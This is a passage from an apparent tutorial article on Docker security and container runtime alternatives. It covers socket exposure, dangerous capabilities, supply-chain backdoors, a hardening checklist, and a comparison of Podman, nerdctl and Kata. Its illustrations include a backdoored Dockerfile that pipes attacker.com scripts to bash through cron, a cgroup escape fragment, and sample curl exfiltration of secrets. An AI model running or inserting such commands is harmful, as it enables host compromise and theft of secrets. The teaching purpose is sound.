&lt;p&gt;&lt;strong&gt;Defense:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Never mount the Docker socket into untrusted containers&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;If you must (e.g., for CI/CD tools like Portainer, Traefik), use &lt;strong&gt;socket proxies&lt;/strong&gt; that filter allowed API calls:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;  &lt;span class="c"&gt;# Use tecnativa/docker-socket-proxy to restrict allowed operations&lt;/span&gt;
  docker run &lt;span class="nt"&gt;-v&lt;/span&gt; /var/run/docker.sock:/var/run/docker.sock &lt;span class="se"&gt;\&lt;/span&gt;
             &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;CONTAINERS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1 &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;POST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0 &lt;span class="se"&gt;\&lt;/span&gt;
             tecnativa/docker-socket-proxy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  11.5 Attack Vector 4: Dangerous Capabilities
&lt;/h3&gt;

&lt;p&gt;Linux capabilities break down root's powers into ~40 distinct privileges. By default, Docker drops most of them, but some workloads require specific capabilities back.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dangerous capabilities:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CAP_SYS_ADMIN&lt;/strong&gt; — The "god mode" capability. Allows:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Mounting filesystems&lt;/li&gt;
&lt;li&gt;Creating namespaces&lt;/li&gt;
&lt;li&gt;Loading kernel modules&lt;/li&gt;
&lt;li&gt;Basically everything that defines "root"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Attack with CAP_SYS_ADMIN:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Container started with --cap-add=SYS_ADMIN&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; /mnt/cgroup
mount &lt;span class="nt"&gt;-t&lt;/span&gt; cgroup &lt;span class="nt"&gt;-o&lt;/span&gt; memory memory /mnt/cgroup
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$$&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /mnt/cgroup/release_agent  &lt;span class="c"&gt;# Escape via cgroup release_agent&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;CAP_SYS_PTRACE&lt;/strong&gt; — Allows attaching to any process:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Attach to dockerd or another container's PID 1&lt;/span&gt;
gdb &lt;span class="nt"&gt;-p&lt;/span&gt; &amp;lt;dockerd-pid&amp;gt;
&lt;span class="c"&gt;# Inject shellcode, steal secrets, modify memory&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;CAP_NET_ADMIN&lt;/strong&gt; — Network configuration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create network namespaces, sniff traffic&lt;/span&gt;
ip netns add attacker
&lt;span class="c"&gt;# Modify iptables rules&lt;/span&gt;
iptables &lt;span class="nt"&gt;-F&lt;/span&gt;  &lt;span class="c"&gt;# Flush all rules&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Defense:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Start with nothing, add only what's needed&lt;/span&gt;
docker run &lt;span class="nt"&gt;--cap-drop&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;ALL &lt;span class="nt"&gt;--cap-add&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;NET_BIND_SERVICE my-image

&lt;span class="c"&gt;# Audit what capabilities your containers actually use&lt;/span&gt;
docker inspect &amp;lt;container&amp;gt; | jq &lt;span class="s1"&gt;'.[].HostConfig.CapAdd'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  11.6 Attack Vector 5: Supply Chain (Compromised Images)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;The scenario:&lt;/strong&gt; You run &lt;code&gt;docker pull nginx&lt;/code&gt; and execute code you've never audited.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What could go wrong:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Backdoored base images:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="c"&gt;# Looks innocent&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; ubuntu:22.04&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; nginx

&lt;span class="c"&gt;# But the Dockerfile also did this:&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;curl http://attacker.com/backdoor.sh | bash
&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"* * * * * curl http://attacker.com/exfil.sh | bash"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /etc/cron.d/exfil
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Crypto miners:&lt;/strong&gt; Many compromised images quietly mine cryptocurrency, consuming CPU that you pay for in cloud bills.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Data exfiltration:&lt;/strong&gt; The container can read environment variables (&lt;code&gt;docker run -e DATABASE_PASSWORD=secret&lt;/code&gt;), mounted volumes, and make outbound network connections.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Defense layers:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Image scanning:&lt;/strong&gt; Scan for known CVEs before running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Using Trivy (open source)&lt;/span&gt;
trivy image nginx:latest

&lt;span class="c"&gt;# Example output:&lt;/span&gt;
&lt;span class="c"&gt;# nginx:latest (ubuntu 22.04)&lt;/span&gt;
&lt;span class="c"&gt;# Total: 24 (CRITICAL: 2, HIGH: 8, MEDIUM: 14)&lt;/span&gt;
&lt;span class="c"&gt;# CVE-2023-1234 | CRITICAL | openssl | 3.0.2-0ubuntu1 | Buffer overflow&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;2. Content trust / image signing:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Enable Docker Content Trust&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;DOCKER_CONTENT_TRUST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1

&lt;span class="c"&gt;# Only pull images signed with trusted keys&lt;/span&gt;
docker pull nginx:latest
&lt;span class="c"&gt;# Error: No trust data for latest&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;3. Use distroless or minimal base images:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="c"&gt;# Instead of ubuntu (72MB with shell, package manager, etc.)&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; gcr.io/distroless/base-debian11  # 20MB, no shell, no package manager&lt;/span&gt;

&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; my-app /app&lt;/span&gt;
&lt;span class="k"&gt;CMD&lt;/span&gt;&lt;span class="s"&gt; ["/app"]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Why? No shell = attacker can't run &lt;code&gt;curl | bash&lt;/code&gt; even if they compromise the app.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Run as non-root user:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; ubuntu:22.04&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;useradd &lt;span class="nt"&gt;-u&lt;/span&gt; 1001 &lt;span class="nt"&gt;-m&lt;/span&gt; appuser
&lt;span class="k"&gt;USER&lt;/span&gt;&lt;span class="s"&gt; appuser&lt;/span&gt;
&lt;span class="k"&gt;CMD&lt;/span&gt;&lt;span class="s"&gt; ["./my-app"]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now if the app is compromised, the attacker is UID 1001, not root.&lt;/p&gt;

&lt;h3&gt;
  
  
  11.7 Defense in Depth: How the Layers Work Together
&lt;/h3&gt;

&lt;p&gt;Here's a concrete example of how multiple defenses stop an attack:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scenario:&lt;/strong&gt; An attacker exploits an RCE vulnerability in your web app running in a container.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Step 1: Attacker gets code execution inside container
        → They're running as UID 1001 (non-root user)

Step 2: Attacker tries: mount /dev/sda1 /mnt
        → BLOCKED by capabilities (no CAP_SYS_ADMIN)

Step 3: Attacker tries: docker run --privileged (via mounted socket)
        → BLOCKED - no Docker socket mounted

Step 4: Attacker tries: apt-get install nmap
        → BLOCKED - running distroless image (no package manager)

Step 5: Attacker tries: reboot
        → BLOCKED by seccomp (reboot syscall not allowed)

Step 6: Attacker tries: while true; do :; done &amp;amp;  (fork bomb)
        → BLOCKED by cgroups (pids.max = 100)

Step 7: Attacker tries: dd if=/dev/zero of=/file bs=1G count=100
        → BLOCKED by cgroups (disk I/O limits)

Step 8: Attacker tries: curl http://attacker.com/exfil &amp;lt; /app/secrets.txt
        → WORKS - but secrets aren't in the container (mounted as read-only volume)

Step 9: Attacker tries: rm -rf /app
        → BLOCKED - filesystem mounted read-only (--read-only flag)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Even with RCE, the attacker can't escape, can't persist, can't exfiltrate sensitive data, and can't cause resource exhaustion.&lt;/p&gt;

&lt;h3&gt;
  
  
  11.8 Hardening Checklist
&lt;/h3&gt;

&lt;p&gt;Here's a practical checklist for production containers:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="c"&gt;# Drop all capabilities, add back only what's needed&lt;/span&gt;
  &lt;span class="nt"&gt;--cap-drop&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;ALL &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--cap-add&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;NET_BIND_SERVICE &lt;span class="se"&gt;\&lt;/span&gt;

  &lt;span class="c"&gt;# Run as non-root&lt;/span&gt;
  &lt;span class="nt"&gt;--user&lt;/span&gt; 1001:1001 &lt;span class="se"&gt;\&lt;/span&gt;

  &lt;span class="c"&gt;# Read-only root filesystem&lt;/span&gt;
  &lt;span class="nt"&gt;--read-only&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--tmpfs&lt;/span&gt; /tmp:rw,noexec,nosuid,size&lt;span class="o"&gt;=&lt;/span&gt;100m &lt;span class="se"&gt;\&lt;/span&gt;

  &lt;span class="c"&gt;# Limit resources&lt;/span&gt;
  &lt;span class="nt"&gt;--memory&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;512m &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--cpus&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1.0 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--pids-limit&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;100 &lt;span class="se"&gt;\&lt;/span&gt;

  &lt;span class="c"&gt;# Enable security profiles&lt;/span&gt;
  &lt;span class="nt"&gt;--security-opt&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;no-new-privileges &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--security-opt&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;seccomp&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/path/to/custom-seccomp.json &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--security-opt&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;apparmor&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;docker-default &lt;span class="se"&gt;\&lt;/span&gt;

  &lt;span class="c"&gt;# Network isolation&lt;/span&gt;
  &lt;span class="nt"&gt;--network&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;isolated-net &lt;span class="se"&gt;\&lt;/span&gt;

  &lt;span class="c"&gt;# Never do this:&lt;/span&gt;
  &lt;span class="c"&gt;# --privileged                          # NO!&lt;/span&gt;
  &lt;span class="c"&gt;# -v /var/run/docker.sock:/var/...      # NO!&lt;/span&gt;
  &lt;span class="c"&gt;# -v /:/host                             # NO!&lt;/span&gt;
  &lt;span class="c"&gt;# --cap-add=SYS_ADMIN                    # NO!&lt;/span&gt;

  my-app:latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  11.9 The Bottom Line
&lt;/h3&gt;

&lt;p&gt;Docker's security model is &lt;strong&gt;kernel-based isolation&lt;/strong&gt;, not &lt;strong&gt;hypervisor-based isolation&lt;/strong&gt;. This means:&lt;/p&gt;

&lt;p&gt;✅ &lt;strong&gt;Fast:&lt;/strong&gt; No VM overhead&lt;br&gt;
✅ &lt;strong&gt;Efficient:&lt;/strong&gt; Shared kernel, minimal duplication&lt;br&gt;
❌ &lt;strong&gt;Shared attack surface:&lt;/strong&gt; One kernel vulnerability can break all containers&lt;/p&gt;

&lt;p&gt;For &lt;strong&gt;untrusted workloads&lt;/strong&gt; (running customer code, multi-tenant SaaS), consider:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Kata Containers&lt;/strong&gt; (VM-based isolation - see Section 12)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;gVisor&lt;/strong&gt; (userspace kernel emulation)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Firecracker&lt;/strong&gt; (microVMs)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For &lt;strong&gt;trusted workloads&lt;/strong&gt; (your own apps), Docker's default security + hardening is sufficient — just follow the checklist above.&lt;/p&gt;

&lt;p&gt;The key insight: Security isn't binary. It's about &lt;strong&gt;reducing the blast radius&lt;/strong&gt; when (not if) something goes wrong.&lt;/p&gt;




&lt;h2&gt;
  
  
  12. Docker vs. Podman vs. nerdctl vs. Kata Containers
&lt;/h2&gt;

&lt;p&gt;Now that we've internalized how Docker works layer by layer, the natural question is: &lt;em&gt;what are the alternatives, and where do they diverge at the architectural level?&lt;/em&gt; This section isn't a feature checklist — it's a structural comparison. Every difference traced below maps directly to the internals we covered above.&lt;/p&gt;

&lt;h3&gt;
  
  
  12.1 Architectural Comparison at a Glance
&lt;/h3&gt;

&lt;p&gt;The single biggest differentiator across all these tools is &lt;strong&gt;where in the stack they place the daemon&lt;/strong&gt; — or deliberately remove it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftwoczpgg8syl4exdkymz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftwoczpgg8syl4exdkymz.png" alt="architectural comparison" width="800" height="408"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  12.2 Docker — The Daemon-Centric Model
&lt;/h3&gt;

&lt;p&gt;Docker's architecture is exactly what we dissected in Sections 2–5. The defining characteristic is the &lt;strong&gt;persistent root daemon&lt;/strong&gt; (&lt;code&gt;dockerd&lt;/code&gt;). Every container operation routes through it. This gives Docker a centralized control plane — easy to manage, easy to expose remotely via API — but it also means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A single daemon crash can bring down all containers on that host.&lt;/li&gt;
&lt;li&gt;The daemon socket (&lt;code&gt;/var/run/docker.sock&lt;/code&gt;) is a high-value attack target. Anyone who can write to it has full host control.&lt;/li&gt;
&lt;li&gt;Docker &lt;em&gt;does&lt;/em&gt; offer a rootless mode (introduced in 2021), but it works by launching a &lt;strong&gt;user-space daemon&lt;/strong&gt; that mimics the traditional architecture rather than removing the daemon entirely. It improves security but retains the fundamental client-server shape.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Docker's strength remains its ecosystem — over 20 million developers, deep integration with CI/CD platforms (GitHub Actions, Jenkins, GitLab), and Docker Hub as the dominant public registry.&lt;/p&gt;

&lt;h3&gt;
  
  
  12.3 Podman — The Daemonless, Rootless Alternative
&lt;/h3&gt;

&lt;p&gt;Podman (created by Red Hat) flips the architectural model. There is &lt;strong&gt;no persistent background daemon&lt;/strong&gt;. When you run &lt;code&gt;podman run nginx&lt;/code&gt;, the CLI directly forks a child process that invokes &lt;code&gt;runc&lt;/code&gt; (or &lt;code&gt;crun&lt;/code&gt;). Each container is a direct child of your shell or of &lt;code&gt;systemd&lt;/code&gt; — the process tree looks like normal user processes.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe1mh419lj3ytp5wzwcml.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe1mh419lj3ytp5wzwcml.png" alt="podman" width="800" height="467"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The security implications are substantial. Podman does not use a central daemon — each container starts as a child process of the user session that launched it. There is no persistent background service and no privileged socket running in the system. This removes the daemon as an attack surface entirely.&lt;/p&gt;

&lt;p&gt;Rootless operation is where Podman's architecture truly shines. Podman allows regular unprivileged users to run containers without requiring any root privileges on the host, leveraging user namespaces: inside the container, processes can run as root (UID 0) but that root is mapped to an unprivileged user ID on the host.&lt;/p&gt;

&lt;p&gt;Podman's networking in rootless mode uses &lt;strong&gt;slirp4netns&lt;/strong&gt; or the newer &lt;strong&gt;pasta&lt;/strong&gt; backend (introduced in Podman 5.0+) for user-mode networking, rather than Docker's privileged bridge + iptables approach. This is a meaningful trade-off: Docker's mature, privileged networking can achieve higher throughput (8–10 Gbps), while rootless Podman networking, though much improved with the pasta backend, typically peaks around 2–4 Gbps.&lt;/p&gt;

&lt;p&gt;Podman also has a native concept of &lt;strong&gt;pods&lt;/strong&gt; — groups of containers that share a network namespace — which maps directly to the Kubernetes Pod model. You can use &lt;code&gt;podman generate kube&lt;/code&gt; to create Kubernetes manifests directly from running containers, and &lt;code&gt;podman play kube&lt;/code&gt; to deploy them.&lt;/p&gt;

&lt;h3&gt;
  
  
  12.4 nerdctl — Direct Access to containerd
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;nerdctl&lt;/code&gt; is a Docker-compatible CLI that talks directly to &lt;strong&gt;containerd&lt;/strong&gt; via gRPC — completely bypassing &lt;code&gt;dockerd&lt;/code&gt;. The architecture is simpler than Docker's (no extra daemon layer on top of containerd) but still daemon-based, since containerd itself runs as a persistent service.&lt;/p&gt;

&lt;p&gt;The goal of nerdctl is to facilitate experimenting with cutting-edge features of containerd that are not present in Docker, including on-demand image pulling (lazy-pulling) and image encryption/decryption.&lt;/p&gt;

&lt;p&gt;The standout features that nerdctl exposes — which Docker does not yet support natively — include:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lazy pulling (eStargz / Nydus / SOCI):&lt;/strong&gt; Traditional image pulls download every layer before the container can start. Lazy pulling streams layers on demand — the container starts running while layers it hasn't touched yet are still downloading. This can dramatically reduce cold-start times for large images.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Image encryption (OCIcrypt):&lt;/strong&gt; Layers can be encrypted at rest and in transit. The decryption key is provided at runtime, meaning even a compromised registry can't expose image contents.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;P2P image distribution (IPFS):&lt;/strong&gt; Images can be pushed and pulled over IPFS, removing reliance on centralized registries entirely.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Image signing (cosign):&lt;/strong&gt; Native &lt;code&gt;--verify=cosign&lt;/code&gt; on pull and &lt;code&gt;--sign=cosign&lt;/code&gt; on push, bringing software supply chain security into the CLI workflow.&lt;/p&gt;

&lt;p&gt;Unlike &lt;code&gt;ctr&lt;/code&gt; (containerd's own debugging CLI), nerdctl aims to be user-friendly and Docker-compatible. To some extent, nerdctl + containerd can seamlessly replace docker + dockerd. It also supports &lt;code&gt;nerdctl compose&lt;/code&gt;, making multi-container workflow migration straightforward.&lt;/p&gt;

&lt;h3&gt;
  
  
  12.5 Kata Containers — VM-Based Isolation
&lt;/h3&gt;

&lt;p&gt;All three tools above (Docker, Podman, nerdctl) share the same fundamental isolation boundary: &lt;strong&gt;Linux namespaces and cgroups on a shared kernel.&lt;/strong&gt; If a kernel vulnerability is exploited, isolation can be broken. Kata Containers solves this by replacing the namespace boundary with a &lt;strong&gt;hardware virtualization boundary&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;At its core, Kata Containers sits underneath your existing container runtime and launches every container (or pod) inside a lightweight VM. Each container gets its own &lt;strong&gt;guest kernel&lt;/strong&gt; running inside a microVM spawned by a hypervisor (QEMU, Cloud-Hypervisor, or AWS Firecracker).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc88c21w008qkx60ikpv4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc88c21w008qkx60ikpv4.png" alt="kata containers" width="800" height="1318"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The Kata Container runtime launches each container within its own hardware-isolated VM, and each VM has its own kernel. Due to this higher degree of isolation, certain container capabilities cannot be supported or are implicitly enabled through the VM.&lt;/p&gt;

&lt;p&gt;The trade-off is cold-start latency and memory overhead. Although improving, booting VMs takes longer than containers, and VMs have more overhead than namespace-based containers. Firecracker (AWS's microVM hypervisor) has brought boot times down to around 125ms, making this viable for serverless and multi-tenant workloads — but it's still measurably slower than a pure namespace-based container.&lt;/p&gt;

&lt;h3&gt;
  
  
  12.6 Head-to-Head: The Architectural Trade-offs
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Daemon?&lt;/th&gt;
&lt;th&gt;Rootless by default?&lt;/th&gt;
&lt;th&gt;Isolation boundary&lt;/th&gt;
&lt;th&gt;Kernel shared?&lt;/th&gt;
&lt;th&gt;Best fit&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;🐋 &lt;strong&gt;Docker&lt;/strong&gt; (Engine 28.x)&lt;/td&gt;
&lt;td&gt;✅ &lt;code&gt;dockerd&lt;/code&gt; (persistent, root)&lt;/td&gt;
&lt;td&gt;❌ Rootful by default&lt;/td&gt;
&lt;td&gt;Namespaces + cgroups&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;Developer experience, ecosystem breadth, CI/CD integration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;🦑 &lt;strong&gt;Podman&lt;/strong&gt; (5.x)&lt;/td&gt;
&lt;td&gt;❌ None (fork/exec model)&lt;/td&gt;
&lt;td&gt;✅ Yes (user namespaces)&lt;/td&gt;
&lt;td&gt;Namespaces + cgroups&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;Security-first, Kubernetes alignment, enterprise / regulated&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;📦 &lt;strong&gt;nerdctl&lt;/strong&gt; (2.x)&lt;/td&gt;
&lt;td&gt;✅ &lt;code&gt;containerd&lt;/code&gt; (lightweight)&lt;/td&gt;
&lt;td&gt;⚠️ Supported, not default&lt;/td&gt;
&lt;td&gt;Namespaces + cgroups&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;Cutting-edge features, lazy pull / encryption, K8s debugging&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;🛡️ &lt;strong&gt;Kata Containers&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;✅ &lt;code&gt;containerd&lt;/code&gt; + kata-shim&lt;/td&gt;
&lt;td&gt;N/A (VM boundary)&lt;/td&gt;
&lt;td&gt;Hardware VM (KVM / Firecracker)&lt;/td&gt;
&lt;td&gt;❌ Each container = own kernel&lt;/td&gt;
&lt;td&gt;Multi-tenant clouds, regulated workloads, untrusted code&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The table above captures the facts — but the &lt;em&gt;why&lt;/em&gt; behind those choices becomes clearer when you see where each tool lands on the isolation vs. performance spectrum:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqnnbatu9f94qyia8zo7e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqnnbatu9f94qyia8zo7e.png" alt="architectural trade-offs" width="800" height="67"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  12.7 When to Choose What
&lt;/h3&gt;

&lt;p&gt;The decision is not about which tool is "best" — it's about which architectural trade-off matches your threat model and operational context.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Choose Docker&lt;/strong&gt; when developer experience and ecosystem breadth matter most. Your team already knows it, your CI/CD pipelines already use it, and you need the widest tool compatibility. It remains the de facto standard for local development and remains deeply integrated into every major cloud platform.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Choose Podman&lt;/strong&gt; when security posture is the primary concern. If you're in a regulated industry, running shared CI runners where multiple teams' code executes on the same host, or deploying on immutable Linux distributions (Fedora Atomic, Silverblue, Bazzite), Podman's daemonless and rootless-by-default architecture eliminates entire categories of attack surface. Its native pod model also makes it a natural fit for teams building toward Kubernetes-native workflows.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Choose nerdctl&lt;/strong&gt; when you want to push the boundaries of what containers can do. Lazy pulling, encrypted images, P2P distribution, and cosign verification are features that don't exist in Docker today. It's also the best tool for understanding containerd's internals directly — since it bypasses dockerd entirely, you're seeing the runtime with one fewer abstraction layer.&lt;/p&gt;

